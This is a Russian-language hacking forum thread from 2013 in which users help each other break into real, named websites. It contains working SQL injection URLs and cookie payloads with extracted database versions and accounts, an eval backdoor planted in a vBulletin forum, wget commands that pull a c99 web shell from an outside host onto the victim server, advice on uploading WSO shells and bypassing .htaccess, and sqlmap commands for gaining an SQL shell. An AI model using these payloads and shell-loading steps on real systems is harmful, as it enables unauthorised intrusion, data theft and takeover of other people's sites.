http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74%27+or%201%20group%20by%20concat%28user%28 %29,floor%28rand%280%29*2%29%29%20having%20min%280 %29%20or%201+--+
Duplicate entry 'asanbiotech_e@localhost1' for key 1
Заарнее благодарен
http://www.timesworld24.com/cat-news-details.php?id=1
Инъекция в числовом параметре
Определим количество столбцов (смотрим низ страницы)
http://www.timesworld24.com/cat-news-details.php?id=1+group+by+7+--+#.UR8NhG-rEhH TRUE
http://www.timesworld24.com/cat-news-details.php?id=1+group+by+8+--+#.UR8NhG-rEhH FALSE
Обходим WAF
http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,2,3,4,5,6,7)+--+
Добиваемся вывода
http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,concat_ws(0x3a,ver sion(),user()),3,4,5,6,7)+--+#.UR8NQW-rEhH
5.5.23-55:timeswor_n2031t2@localhost
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1='1
Инъекция в строковом параметре
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+25+--+ TRUE
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+26+--+ FALSE
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,'25#+--+
Данные передаются в UPDATE запрос, а значит финт ушами не прокатит.
Остаётся BLIND
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=if(substring((@@version),1,1)=4,1, 2)+--+
Ну или более привычный вам
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+substring((@@version),1,1)=4+--+
Есть возможность крутить как Error-Based, но её уже предложили выше.
http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27
Инъекция в числовом параметре
Добиваемся вывода
http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27+and+1=2+union+select+1,unhex(hex(@@version)) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
0xd098d0b3d0
16.02.2013, 18:09
Вобщем суть такая. Есть форма активации одной софтинки. Софтинка при установке привязывается к железу. В форму вводишь ключ который получился от привязки (по типу 45F7EF0456A88B0536633746C986 )
И ключ оплаты который получил на сайте, после оплаты.
Вот собственно форма Активации: _http://worldbik.ru/act.php
В ней два поля. Ковычки и т.п. Фильтруется, однако если в верхнее поле (код оплаты) ввести русские буквы ( в нижнее поле нужно ввести что угодно, чтобы не было пустым.) то вылазит ошибка Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/muwik/worldbik.ru/act.php on line 76
Можно ли как нибудь этим воспользоваться, или кроме раскрытия путей это ничего не даст?
antielvis
17.02.2013, 16:17
Подскажите, можно отсюда что-нибудь вытащить? Или в каком направлении двигаться?
http://site.ru/index.php?area=viewSale&id=31
class: PostgresDatabaseException
code: 42P01
message: ERROR: 42P01: relation "sale" does not exist - SELECT "sale"."id", "sale"."category_id", "sale"."title", "sale"."created", "sale"."announce", "sale"."content", "sale"."project_id" FROM "sale" WHERE ("sale"."id" = '31')
#0 /var/www/onphp-framework/core/DB/DB.class.php(321): PgSQL->queryRaw('SELECT "sale"."...')
#1 /var/www/onphp-framework/core/DB/PgSQL.class.php(126): DB->query(Object(SelectQuery))
#2 /var/www/onphp-framework/main/DAOs/Workers/BaseDaoWorker.class.php(152): PgSQL->queryRow(Object(SelectQuery))
#3 /var/www/onphp-framework/main/DAOs/Workers/CommonDaoWorker.class.php(53): BaseDaoWorker->cachedFetchObject(Object(SelectQuery), 604800, true)
#4 /var/www/onphp-framework/main/DAOs/Workers/TransparentDaoWorker.class.php(29): CommonDaoWorker->getById(31, 604800)
#5 /var/www/onphp-framework/main/DAOs/GenericDAO.class.php(165): TransparentDaoWorker->getById(31, 3600)
#6 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(144): GenericDAO->getById(31)
#7 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(118): PrimitiveIdentifier->actualImportValue(31)
#8 /var/www/onphp-framework/core/Form/Form.class.php(422): PrimitiveIdentifier->import(Array)
#9 /var/www/onphp-framework/core/Form/Form.class.php(299): Form->importPrimitive(Array, Object(PrimitiveIntegerIdentifier))
#10 /var/www/site.ru/friends/newAwards-msk/user/controllers/viewNews.class.php(22): Form->import(Array)
#11 /var/www/site.ru/library/classes/Flow/PosterSessionFilter.class.php(66): viewNews->handleRequest(Object(HttpRequest))
#12 /var/www/site.ru/friends/newAwards-msk/classes/Flow/ProjectFilter.class.php(29): PosterSessionFilter->handleRequest(Object(HttpRequest))
#13 /var/www/site.ru/friends/newAwards-msk/user/htdocs/index.php(56): ProjectFilter->handleRequest(Object(HttpRequest))
#14 {main}
при запросе
?area=viewSale&id=31'+or+"sale"."id" = '31 или
?area=viewSale&id=31'+or+id = '31 отправляет на главную страницу
Судя по всему - это PostgreSQL.
А значит и инъектировать надо с особенностями этого SQL языка.
http://bilet.aero/news/event?id=4'
плиз...
http://bilet.aero/news/event?id=4'
плиз...
http://bilet.aero/news/event?id=4)or(1)group+by(mid(version(),rand(0)|0)) having(avg(0))and(1)--+-
Duplicate entry '5.0.51a-24+lenny2'
dynda2000
18.02.2013, 20:51
Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php
Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php
Да, посмотреть вывод команды phpinfo()
Трям.
Как можно с помощью js скрипта подгрузить шелл ?
тобишь я могу в корень сайта влепить код типа:
пхп коды не обрабатываются
Boombilka
22.02.2013, 11:20
Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
Phpinfo(); выводится.
Пробую вот так:
faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy'));
И ничего. Что я не так делаю?
Boombilka
22.02.2013, 13:37
Возник другой вопрос.
system("wget -O customavatars/sss.php http://c99.gen.tr/c99.txt");
Делаю вот так, папка кастом аватарс доступна под запись. Сайт бесконечно грузит этот запрос. Отображаю файлы из каталога:
system("cd customavatars;ls -al");
Файл создается, но создается он странно:
-rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php
и при попытке чтения вылетает Internal Server Error
Опять таки, что я делаю не так?
Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
Phpinfo(); выводится.
Пробую вот так:
faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy'));
И ничего. Что я не так делаю?
Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt));
При этом у шелла надо убрать вначале
Файл создается, но создается он странно:
Код:
-rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php
и при попытке чтения вылетает Internal Server Error
Опять таки, что я делаю не так?
Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess
Boombilka
22.02.2013, 14:45
Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt));
При этом у шелла надо убрать вначале
Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess
Я убирал , лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?
Я убирал , лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?
просто загрузи пустой .htaccess
Boombilka
22.02.2013, 15:03
просто загрузи пустой .htaccess
через что? У меня же нету прав на загрузку, разве нет?
Файл создается, но создается он странно:
если файл создается , так прав на папке хватает
Boombilka
22.02.2013, 15:16
если файл создается , так прав на папке хватает
да это понятно, но файл то нулевого размера. И .htaccess не могу заменить
да это понятно, но файл то нулевого размера. И .htaccess не могу заменить
Ну отправь линк в ПМ. Помучаем вместе.
lessmore
23.02.2013, 04:23
Существует ли способ обойти trim() при использовании блайнда?
И, вместе с тем, возможно ли использовать
where id='$_GET['id']' and xxx=....
без применения комментариев?
exstreme
23.02.2013, 23:13
Помогите разобраться с Blind SQL
POST /fight_forum/search.php?sd=-1%20or%2091%3d89&search_id=unanswered&sid=50defd8e5ccb6ed213919316b7e044a4&sk=t&sr=topics&st=0 HTTP/1.1
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: site.com
Cookie: cookie
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
sd=a&sk=a&sort=%d0%9f%d0%b5%d1%80%d0%b5%d0%b9%d1%82%d0%b8&st=0
Помогите разобраться с Blind SQL
/fight_forum/search.php?sd=-1%20or%2091%3d89&search_id=unanswered&sid=50defd8e5ccb6ed213919316b7e044a4&sk=t&sr=topics&st=0 HTTP/1.1
Тут нет инъекта.
Над тобой девелоперы Акунетикса поглумились, а ты и не заметил...
exstreme
23.02.2013, 23:57
Тут нет инъекта.
Над тобой девелоперы Акунетикса поглумились, а ты и не заметил...
Жаль, а можно прояснить, на чем основано ложное срабатывание?
Тем, что Акунетикс своими запросами в 10+ потоков, нагрузил сайт и тот момент когда у него шла проверка на SQL иньекции, сайт чуток призадумался и выдал либо не тот контент (ошибку, например) или долго отвечал, и Акунетикс, любит это понимать, как рабочий вектор и сразу выдает Blind SQL Injection!
exstreme
24.02.2013, 01:40
Тем, что Акунетикс своими запросами в 10+ потоков, нагрузил сайт и тот момент когда у него шла проверка на SQL иньекции, сайт чуток призадумался и выдал либо не тот контент (ошибку, например) или долго отвечал, и Акунетикс, любит это понимать, как рабочий вектор и сразу выдает
Blind SQL Injection
!
Видно так и есть, сделал ретест, опровергло результат. Всем спасибо за помощь.
Друзья помогите нашел инекцию как ее реализовать инъексция в пост запросе
DbException: Query failed:
SELECT `users`.`id`, IF(name != "", name, login) AS `title`, `users`.`city_id`, `users`.`group_id`, `users`.`email`, `users`.`login`, `users`.`password`, `users`.`name`, `users`.`salt`, `users`.`key`, IF(`users_groups`.`god`, "god", IF(`users`.`group_id`=4, "tl", "hr")) AS `access`,`users_groups`.`id` AS `users_groups:id`,`users_groups`.`title` AS `users_groups:title`,`users_groups`.`god` AS `users_groups:god`,`users_groups`.`custom` AS `users_groups:custom`
FROM `skb_users` AS `users`
LEFT JOIN `skb_users_groups` AS `users_groups` ON ((`users`.`group_id` = `users_groups`.`id`) AND (`users_groups`.`_state` = 0))
WHERE `users`.`_state` = 0 AND (`users`.`login` = '\'\"\\\'\\\");|]*`users`.`%0d%0a' AND {realm` = 'cms')
LIMIT 1
в '"\'\");|]*{%0d%0a могу вставить что угодно
сам запрос такой
Content-Disposition: form-data; name="_login"
'"\'\");|]*{%0d%0a
Content-Disposition: form-data; name="_password"
sdsd
что сделать дальше?
winstrool
27.02.2013, 21:51
Друзья помогите нашел инекцию как ее реализовать инъексция в пост запросе
DbException: Query failed:
SELECT `users`.`id`, IF(name != "", name, login) AS `title`, `users`.`city_id`, `users`.`group_id`, `users`.`email`, `users`.`login`, `users`.`password`, `users`.`name`, `users`.`salt`, `users`.`key`, IF(`users_groups`.`god`, "god", IF(`users`.`group_id`=4, "tl", "hr")) AS `access`,`users_groups`.`id` AS `users_groups:id`,`users_groups`.`title` AS `users_groups:title`,`users_groups`.`god` AS `users_groups:god`,`users_groups`.`custom` AS `users_groups:custom`
FROM `skb_users` AS `users`
LEFT JOIN `skb_users_groups` AS `users_groups` ON ((`users`.`group_id` = `users_groups`.`id`) AND (`users_groups`.`_state` = 0))
WHERE `users`.`_state` = 0 AND (`users`.`login` = '\'\"\\\'\\\");|]*`users`.`%0d%0a' AND {realm` = 'cms')
LIMIT 1
в '"\'\");|]*{%0d%0a могу вставить что угодно
сам запрос такой
Content-Disposition: form-data; name="_login"
'"\'\");|]*{%0d%0a
Content-Disposition: form-data; name="_password"
sdsd
что сделать дальше?
Может ссыль дашь? а там дальше посмотрим, что можно сделать
Может ссыль дашь? а там дальше посмотрим, что можно сделать
Блин извени не могу очень важный для меня объект)а так не подскажешь?
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?
Кодировать запрос? http://urlencode.ru/
TeslaNik
28.02.2013, 16:25
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.
TeslaNik
28.02.2013, 16:35
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.
Спасибо буду зубрить=)
Возможно сформировать запрос так чтоб скрипт выдал
query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
?
Скрипт pastebin (http://pastebin.com/0W9YU5H0)
zloy_fantom
01.03.2013, 19:07
Прошу помощи:
На сайте есть скрипт usr.php
следующего содержания:
get ('usr_'.$id);
if (!$ret)
{
$SQL = sqli::get ();
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
$ret = $x->fetch_assoc ();
$memcache->set ('usr_'.$id, $ret, 0, 300);
}
return $ret;
}
?>
Насколько я понял, скрипт реализует функцию извлечения инфы из базы данных по идентификатору пользователя, но как ему сообщить этот идентификатор?
Моих познаний хватило только на следующее:
site.com/usr.php?id=1
Хотя и понимаю, что это неверно, подскажите, пожалуйста правильный запрос.
Спасибо
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
Вот сам запрос...
А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)
А уж как и откуда она берётся до функции - куча и куча вариантов...
zloy_fantom
02.03.2013, 12:35
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` =
$id
");
Вот сам запрос...
Спасибо, это я понял,
А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)
Это тоже.
А уж как и откуда она берётся до функции - куча и куча вариантов...
А вот тут непонятно: Приведенный код - это весь файл ПХП, лежащий в корне сервера, как я понял, переменная в функцию передается напрямую при запросе пхп-скрипта.
Так вот я и не понял, с каким синтаксисом составить запрос, чтобы переменная из него передалась в функцию.
Я только начинаю, поэтому со скрипом въезжаю в некоторые вопросы.
Спасибо
panfilov1991
02.03.2013, 13:45
Просканировал сайт программой Acunetix Web Vulnerability Scanner 8
Нашел 24 уязвимости.
Проблема в том, что он дает описание и содержимое этих уязвимостей, НО не дает прямую ссылку на неё.
Показывать сайт не буду из-за религиозных соображений.
Кто реально готов помочь, могу скинуть сохраненный файл от сканированного сайта.
------------
вот одна из них:
SQL injection (verified)
This vulnerability affects
/servers
.
Discovered by: Scripting (Sql_Injection.script).
Attack details
Cookie input
pass
was set to
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(7 3),CHAR(55),CHAR(87),CHAR(111),CHAR(67),CHAR(71),C HAR(99)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
Injected pattern found:
4Cu2I7WoCGc
------------
Request
GET /servers HTTP/1.1
Cookie: login=demodemo; pass=%22and%28select 1 from%28select count%28%2A%29%2Cconcat%28%28select concat%28CHAR%2852%29%2CCHAR%2867%29%2CCHAR%28117% 29%2CCHAR%2850%29%2CCHAR%2873%29%2CCHAR%2855%29%2C CHAR%2887%29%2CCHAR%28111%29%2CCHAR%2867%29%2CCHAR %2871%29%2CCHAR%2899%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x from information_schema.tables group by x%29a%29and%22
Host: game.сайт.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
--------------
http://cs421621.vk.me/v421621376/4a06/i_0wBDU7Nkc.jpg
panfilov1991, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри
kacergei
02.03.2013, 17:34
погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)
zloy_fantom
02.03.2013, 17:51
Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).
Нашел следующий скрипт sql.php:
Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?
Спасибо
zloy_fantom, только если есть шел на уязвимой машине
Улыбайся
02.03.2013, 17:59
Кто может подсказать по xss. Напишите пожалуйста в личку.
panfilov1991
02.03.2013, 20:04
panfilov1991
, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.
panfilov1991
02.03.2013, 21:07
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!
помогите
Пожалуйста
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...
Host: game.parlahost.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version() ,schema())),rand(0)|0))having(avg(0))or"
Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'
Версия - 5.5.29-1-log
Названия Базы Данных - s10parl
"or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА (https://antichat.live/threads/43966/)
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!
zloy_fantom
03.03.2013, 13:10
zloy_fantom
, только если есть шел на уязвимой машине
А если такой вариант:
На той-же машине, что и сервер, развернут сервер openvpn, ко внутренней сети которого я подключился как клиент. На паре машин этой сети открыты порты snmp, mysql и ssh. snmp видна просто как расшаренные папки, но в них ничего интересного. По ssh подключение доступно через putty, знать-бы пароль root... А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?
Спасибо
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!
Зарегистрировался, а вот как посмотреть, какие данные для доступа к БД они предоставляют, не понял. Зайти под теми данными попробую (дождусь только, когда админ разлогинится), только что мне это даст? Я ведь все равно не смогу шелл загрузить...Или смогу? Короче, надо пробовать, может будет доступна панель управления или редактирования....
Спасибо
winstrool
03.03.2013, 13:18
А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?
Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...
zloy_fantom
03.03.2013, 15:46
Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...
Не получается: wso положил в расшаренную папку внутренней сети, но каков путь к ней в подсистеме сервера, я не знаю, т.е., через интерпретатор PHP wso не достать
Срочно! Нужна помощь с заливкой шелла!
Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((
Кто может почь, пишите сюда или в ЛС.
Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.
winstrool
03.03.2013, 23:12
Срочно! Нужна помощь с заливкой шелла!
Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((
Кто может почь, пишите сюда или в ЛС.
Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.
Ну когда же вы научитесь самостоятельно искать инфу?! ладно...
заходим в раздел
Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд и внимательно изучаете в ней нужные вам аспекты!
а точнее ткну пальцем!
статьи по PHP инклудам:
php injection (https://antichat.live/threads/12123/)
Автор GreenBear
TRUE PHP-injection (https://antichat.live/threads/23501/)
Автор Zadoxlik
PHP-include и способы защиты (https://antichat.live/threads/91807/)
Автор _Pantera_
[новый способ] замена нулл-байту в инклудах (https://antichat.live/threads/98525/)
Автор [Raz0r]
Логи и конфиги:
Default *log, *conf files locations (https://antichat.live/threads/49775/)
respect ettee
FuckGoogle
03.03.2013, 23:19
phpinfo
здрасте
уменя естъ phpinfo() от крупного сайта...
только спомощю phpinfo() я смогу етот сайт ломатъ?
и как?
можте кто нибудъ нопомч мне?
winstrool
03.03.2013, 23:27
здрасте
уменя естъ phpinfo() от крупного сайта...
только спомощю phpinfo() я смогу етот сайт ломатъ?
и как?
можте кто нибудъ нопомч мне?
Нет не сможите!, phpinfo() выводи инфу о настройках апача и мелкой тароблы не болие того!
Возможно сформировать запрос так чтоб скрипт выдал
query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
?
require_once('../../../wp-config.php');
require_once('../../../wp-includes/functions.php');
// CSRF attack protection. Check the Referal field to be the same
// domain of the script
$k_id=strip_tags($wpdb->escape($_GET['id']));
$k_action=strip_tags($wpdb->escape($_GET['action']));
$k_path=strip_tags($wpdb->escape($_GET['path']));
$k_imgIndex=strip_tags($wpdb->escape($_GET['imgIndex']));
// prevent SQL injection
if (!is_numeric($k_id)) die('error|Query error' );
$table_name=$wpdb->prefix.'comment_rating';
$comment_table_name=$wpdb->prefix.'comments';
if($k_id&&$k_action&&$k_path) {
//Check to see if the comment id exists and grab the rating
$query="SELECT * FROM `$table_name` WHERE ck_comment_ id =$k_id";
$result=mysql_query($query);
if(!$result) { die('error|mysql: '.mysql_error()); }
if(mysql_num_rows($result))
{
$duplicated=0;// used as a counter to off set duplicated votes
if($row= @mysql_fetch_assoc($result))
{
// Handle proxy with original IP address
$ip=getenv("HTTP_X_FORWARDED_FOR") ?getenv("HTTP_X_FORWARDED_FOR") :getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'],$ip)) {
// die('error|You have already voted on this item!');
// Just don't count duplicated votes
$duplicated=1;
$ck_ips=$row['ck_ips'];
}
else {
$ck_ips=$row['ck_ips'] .','.$ip;// IPs are separated by ','
}
}
$total=$row['ck_rating_up'] -$row['ck_rating_down'];
if($k_action=='add') {
$rating=$row['ck_rating_up'] +1-$duplicated;
$direction='up';
$total=$total+1-$duplicated;
}
elseif($k_action=='subtract')
{
$rating=$row['ck_rating_down'] +1-$duplicated;
$direction='down';
$total=$total-1+$duplicated;
} else {
die('error|Try again lat er');//No action given.
}
if (!$duplicated)
{
$query="UPDATE `$table_name` SET ck_rating_$direction= '$rating', ck_ips = '".$ck_ips."' WHERE ck_comment_id =$k_id";
$result=mysql_query($query);
if(!$result)
{
// die('error|query '.$query);
die('error|Query error');
}
// Now duplicated votes will not
if(!mysql_affected_rows())
{
die('error|affected '.$ra ting);
}
$karma_modified=0;
if (get_option('ckrating_karma_ type') =='likes'&&$k_action=='add') {
$karma_modified=1;$karma=$rating;
}
if (get_option('ckrating_karma_ type') =='dislikes'&&$k_action=='subtract') {
$karma_modified=1;$karma=$rating;
}
if (get_option('ckrating_karma_ type') =='both') {
$karma_modified=1;$karma=$total;
}
if ($karma_modified) {
$query="UPDATE `$comment_table_name` SET comment_karma = '$karma' WHERE comment_ID =$k_id";
$result=mysql_query($query);
if(!$result) die('error|C omment Query error');
}
// Invalidate the W3 cache by triggering the global wordpress action hook for an edited comment
do_action("edit_comment",$k_id);
}
} else {
die('error|Comment doesnt exist' );//Comment id not found in db, something wrong ?
}
} else {
die('error|Fatal: html format error');
}
// Add the + sign,
if ($total>0) {$total="+$total"; }
//This sends the data back to the js to pro cess and show on the page
// The dummy field will separate out any pot ential garbage that
// WP-superCache may attached to the end of the return.
echo("done|$k_id|$rating|$k_path|$direction|$total|$k_im gIndex|dummy");
?>
И снова всем привет!
Вот у меня возникла такая проблемка, есть сайт с форумом IPB 2.3.5 на сайте есть sql-injection, довольно быстро получил доступ к БД и сразу же начал дампить данные юзеров форума. И тут получился весь облом. Вся соль в том что есть колонка name, email и т.п. а вот password - нету. Вопрос: где админ мог скрыть пароли юзеров и как?
Sat-hacker
05.03.2013, 13:46
Кто может подробнее обьяснить как компилить запускать exploit?Где качать pyton и т.д.Буду очень благодарен.Есть большое количество шелов.Хотелось бы попробовать получить root.
zloy_fantom
05.03.2013, 16:02
Нашел следующие уязвимости в скриптах:
Торрент-трекеры основанные на TBDev 2.0 YSE
1.
Уязвимость позволяет удалённому пользователю сформировать спец. атакующий url адрес и тем самым выполнять произвольный SQL запрос.
./announce.php
$snatch_updateset[] = "completedat = $dt";
$snatch_updateset[] = "uploaded = uploaded + $uploaded2";
$snatch_updateset[] = "downloaded = downloaded + $downloaded2";
$snatch_updateset[] = "to_go = $left";
$snatch_updateset[] = "port = $port";
$snatch_updateset[] = "last_action = $dt";
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");
3.
Не достаточная фильтрация входящих данных дает возможность совершить атаки на файлы rss.php, announce.php, takesignup.php b на другие файлы где используется функция sqlesc(). Это связано с тем что функция sqlesc() экранирует только параметры string. Если же входящие параметры были распознаны как numeric то они не экранируются.
./include/functions.php
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
./include/functions_announce.php
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
Подскажите, как их можно использовать?
А может кто знает еще типичные уязвимости этого релиза?
Спасибо
Sat-hacker
05.03.2013, 16:03
Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");
в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell
в POST параметре s:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell
в Cookie параметре s:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell
в Referer:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell
в User-Agent:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell
в любом добавочном хидере:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell
и т.д.
zloy_fantom
05.03.2013, 18:00
\/IRUS
